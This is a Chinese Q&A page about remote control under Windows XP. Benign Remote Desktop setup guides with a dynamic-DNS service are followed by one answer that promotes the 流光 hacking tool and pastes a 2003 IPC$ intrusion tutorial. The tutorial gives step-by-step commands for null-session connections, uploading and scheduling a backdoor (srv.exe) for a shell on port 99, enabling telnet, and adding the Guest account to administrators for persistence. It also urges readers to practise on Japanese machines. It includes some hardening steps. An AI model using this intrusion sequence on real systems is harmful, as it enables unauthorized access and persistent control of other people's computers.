XP如何利用自带的远程桌面工具达到远程的目的

问题描述：

问题解答：

用windows自带的远程桌面连接,是最好的方法.具体操作比较复杂.需要设置客户端和服务器端.

相关教程:-----------------------------------------------
1.你首先需要一个支持远程桌面功能windows系统，如windowsXP的专业版或windows2000的服务器以上的版本。当然如果你装个windows2003当然更好。相信微软以后出的windows版本都是支持远程桌面功能的。这部分的操作相信懂得电脑基本的操作的都可以实现的，windows的安装已经设计得很傻瓜了。

2.系统装好了，跟着就是装ADSL，只要可以上网就可以。这部分我这里就不多说了，这个不会我真的就没话可说。

3.接着就是要在你的电脑里装个可以实现动态域名解析功能的软件。这个步骤比较重要。也比较麻烦，为什么要装这个呢，说的简单一点就是让你的电脑拥有一个固定的IP，才能让你在其他任何地方都可以直接连到你的电脑，因为ADSL在每次连通所产生的IP都是不一样的。因为ADSL都是动态分配IP的。所以缺少这个就实现不了远程桌面了。动态域名解析的原理其实不需要我们理解，我们只要能利用它达到连接电脑就可以了，这里就不详说了。那要选择那个动态域名解析软件呢，我尝试几个类似的软件，试用以后我推荐大家使用名叫"花生壳"的动态域名解析软件，因为它是免费的，而且在中国来说它是最大和最稳定的动态域名解析提供商，选择它没有错。免费第一阿！安装和使用"花生壳"还需要一下的几小步骤：

3.1先要去"花生壳"所在的服务网站申请一个免费的护照，其实就是申请会员。成为会员后你的的账号和密码等会就有用了。"花生壳"服务网站是www.oray.net。

3.2有了护照以后就需要再申请一个免费的域名，这个域名是用来连接你的电脑的。等于给你的电脑申请一个电话号码，当你到任何地方打这个号码就可以连到你的电脑。

3.3最后就只要将你申请的花生壳服务激活。然后在这个服务网站下载一个"花生壳"的客户端软件在你的电脑里。

3.4将"花生壳"客户软件在你家里的电脑里安装后，它会提示你提供护照的账号和密码的，就需要你先前申请护照的账号和密码了。填入运行它就可以了。就这样你刚才申请的免费域名就和你的电脑捆绑在一起了。就算ADSL的IP怎么变化你的电脑都逃不出你的手心。

3.5最好提醒你一下，以上所有的操作都是免费的，就是有点烦琐，但是设置一次就可以了，以后都不用了。

4.解决了这个难题，后面的就简单多了，你只需要在你新装的系统的"我的电脑－属性－远程－远程桌面"在这个远程桌面项打上勾，什么都不用管就可以了。那个远程协助不用勾也可以的。这样在你的电脑里的设置就基本完成了。

5.接下来轮到在另一台电脑装一个远程桌面的客户端软件了，你可以在GEOGLE或其他的搜索引擎上随便找到，也可以找到你XP安装光盘安装一个。自己搞吧。以后你需要在哪台电脑上控制你家里的电脑就在那台电脑装，才几百K，存软盘或优盘里就可以随身带，去到那里都可以连回你家的电脑了。

6.windows远程桌面客户端软件是不用安装的，当你在另外一台电脑一打开就是下面这样，你只要在计算机栏填入你在"花生壳"申请的免费域名，然后在用户名和密码就和你的家里电脑登陆时的用户名和密码是一样的，如果你自己都不知道账号和密码，那就去计算机管理那里设置一个。其他都不用填的，其他方面的设置只是功能上的变化。接着你就按下连接，如果你的前面的操作都成功，当然最最重要的就是在你家的电脑要是开着的，这样一瞬间你家里电脑里的亲切桌面将浮现在你眼前。恭喜你，你现在控制了你家里的电脑了。操作上没有任何分别，上网、QQ、工作、音乐、一样都没有少！哈哈！

完成以上的几个步骤，远程桌面连接我们达到了，但是这只是一般的情况，还有很多实际的问题都影响着远程桌面连接功能的实现，例如你的ADSL拨号器是带有路由功能的，那你的电脑等于通过了一个路由器来分配IP，这就需要在路由器上作一个端口映射，让先前所说的免费域名可以通过这个端口来找到你电脑，这样你的远程桌面才可以发挥功效。另外一个很重要的就是安全的问题，既然你的电脑可以被任何电脑连接，所以你就需要个强密码了，这个密码就是你在家里登陆你的电脑的账号和密码。密码最好是多位的，而且要是数字和字母混合的，如果你的记性好搞个10位以上的混合密码那就更好了。

当你用过了远程桌面连接，你会感受到它的小而强大，和你的ADSL的配合是那么的恰当。在你办公室里用着办公室的电脑时，你依然可以使用着你家里的ADSL和电脑做你喜欢的东西，做到真正一个人控制两台，当然如果你有多几台电脑的话，你也同样可以同时控制它们。
参考资料：http://www.yesky.com/ServerIndex/77131891739721728/20040331/1782902_2.shtml
轻松玩转远程桌面
1、远程桌面的功能

远程桌面连接组件是从windows2000server开始由微软公司提供的，在WINDOWS2000 SERVER中他不是默认安装的。该组件一经推出受到了很多用户的拥护和喜好，所以在WINDOWS XP和2003中微软公司将该组件的启用方法进行了改革，我们通过简单的勾选就可以完成在XP和2003下远程桌面连接功能的开启。

当某台计算机开启了远程桌面连接功能后我们就可以在网络的另一端控制这台计算机了，通过远程桌面功能我们可以实时的操作这台计算机，在上面安装软件，运行程序，所有的一切都好象是直接在该计算机上操作一样。这就是远程桌面的最大功能，通过该功能网络管理员可以在家中安全的控制单位的服务器，而且由于该功能是系统内置的所以比其他第三方远程控制工具使用更方便更灵活。

2、远程桌面的前世今生

说起远程桌面很多用户都认为是从WIN2000 SERVER才开始引入的，实际上我们可以在WIN98甚至是DOS中看到他的身影。远程桌面采用的是一种类似TELNET的技术，他是从TELNET协议发展而来的。

计算机发展的早期在很多客户机硬件配置不高无法独立运行程序的情况下，TELNET协议应运而生，他是一种C/S模式，客户机可以通过TELNET登录到高配置的服务器上，在服务器上运行程序。当程序运行时所有的运算与存储都是教给服务器来完成的，当运算结束后服务器才把结果反馈回客户机，这样就可以在客户机配置不够的情况下完成程序的运行工作，而且运行结果出来的一点不慢。

远程桌面连接就是从TELNET发展而来的，通俗的讲他就是图形化的TELNET。所以在下文中我们讲解远程桌面连接的使用时也会稍微介绍一些TELNET的相关知识。

3、启动远程桌面连接的方法

微软操作系统发展至今只有以下三个操作系统可以使用远程桌面功能，他们是WINDOWS 2000SERVER，WINDOWS XP和WINDOWS 2003。这三个系统的开启远程桌面方法各不相同，我们一一介绍。

（1）WINDOWS 2000SERVER

WINDOWS2000系统中PROFESSIONAL版本是不能开启远程桌面功能让别人访问的，但SERVER版可以开启，不过需要我们安装相应的WINDOWS组件。方法如下：
第一步：通过任务栏的“开始->设置->控制面板”，选择里头的“添加/删除程序”。
第二步：在左边选择“添加/删除WINDOWS组件”。
第三步：稍后会出现添加删除WINDOWS组件窗口，我们从中选择“终端服务”，然后点“下一步”进行安装。这里要注意一点的是在安装过程中需要我们插入WINDOWS 2000SERVER系统光盘到光驱中。
第四步：安装完毕后需要重新启动计算机，重启后就完成了在WINDOWS 2000SERVER下的远程桌面连接功能的安装工作。

（2）WINDOWS XP
正如上文提到的，WINDOWS2000引入远程桌面连接功能后受到了广大用户的好评，大家普遍认为开启该功能的方法太复杂，而且在使用时不能保证每个人都拥有WINDOWS2000SERVER光盘。因此在XP和2003系统中微软将远程桌面开启的操作进行了简化。
第一步：在桌面“我的电脑”上点鼠标右键，选择“属性”。
第二步：在弹出的系统属性窗口中选择“远程”标签。
第三步：在远程标签中找到“远程桌面”，在“容许用户连接到这台计算机”前打上对勾后确定即可完成XP下远程桌面连接功能的启用。

（3）WINDOWS 2003
WINDOWS2003开启方法和XP类似，同样对操作步骤进行了简化。方法如下：
第一步：在桌面“我的电脑”上点鼠标右键，选择“属性”。
第二步：在弹出的系统属性窗口中选择“远程”标签。
第三步：在远程标签中找到“远程桌面”，在“容许用户连接到这台计算机”前打上对勾后确定即可完成2003下远程桌面连接功能的启用。

4、使用远程桌面连接的方法

使用远程桌面连接的方法很简单，因为一旦连接到服务器上就和操作本地计算机一样了。所以唯一要讲解的就是连接操作。如何连接到开启了远程桌面功能的计算机呢？我们需要远程桌面连接登录器。

（1）WINDOWS XP和2003操作系统：
这两个系统将远程桌面连接程序内置到附件中，我们不用安装任何程序就可以使用远程桌面连接。
第一步：通过任务栏的“开始->程序->附件->通讯->远程桌面连接”来启动登录程序
第二步：在图4界面中的“计算机”处输入开启了远程桌面功能的计算机IP地址。
第三步：点击“连接”按钮后我们就可以成功登录到该计算机上了，连接上去后如图5所示，和操作自己计算机一样方便一样快捷。

（2）其他WINDOWS操作系统：
2000及以前的WINDOWS中系统没有将登录工具放到附件中，我们有两个方法获得登录器并实现远程桌面的连接功能。
方法一：使用XP光盘登录器——MSRDPCLI
在XP系统光盘盘符下\SUPPORT\TOOLS目录有一个叫做MSRDPCLI.exe的程序，该程序实际上是一个远程桌面连接登录器，在WIN98/2000机器上运行XP光盘目录下的msrdpcli.exe。将自动安装远程桌面连接程序。安装过程非常简单，一路“下一步”即可。完毕以后通过“开始->程序->附件->通讯->远程桌面连接”就可以登录网络上开启远程桌面功能的计算机了。

方法二：第三方登录器
实际上网络中有很多站点都提供了远程桌面登录器的下载，我们在98系统或2000系统上下载该登录器就可以完成登录远程桌面的功能。

ecyj1983
这位仁兄文不对题.....

XP自带系统中有远程桌面连接工具 在开始>所有程序>附件>通讯>远程桌面连接

用这个工具连接对方机器有几个前提要求 : 对方(被连接的机器)开放远程桌面管理服务 一般开放端口为3389 (可以更改) ,再者就是双方防火墙都同意建立这个通道,当然还有就是网络环境足够好,否则用起来比较郁闷.

很多，比如现在流行的流光仪
下载地址http://www.skycn.com/soft/3244.html
这个软件很好，还集成了很多黑客工具！
比如暴力字典 木马种植 等等.........！
利用IPC# 和端口漏洞进行入侵！不过不能干坏事噢！
我介绍你个教程，你看看
tech.163.com/special/h/000915SN/hachervip.html
在上面找流光扫描仪的教程！
不过，远程连接也可以用IPC# WINDOS里自带的远程桌面协助工具！
什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。
关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1）察看本地共享资源
运行-cmd-输入net share
2）删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
3）停止server服务
net stop server /y （重新启动后server服务会重新开启）
4）修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码

（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创http://ccbirds.yeah.net）

八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)
如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\>net time \\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

完成时间:iqst-2003/2/16 23:01 http://ccbirds.yeah.net
更新时间：2003/2/17/23：06
[ccbirds入门级教程]--各个击破1--ipc$入侵

在PROGRAM FILES中有NET MEETING，使用这个来远程
不过必须知道对方的IP地址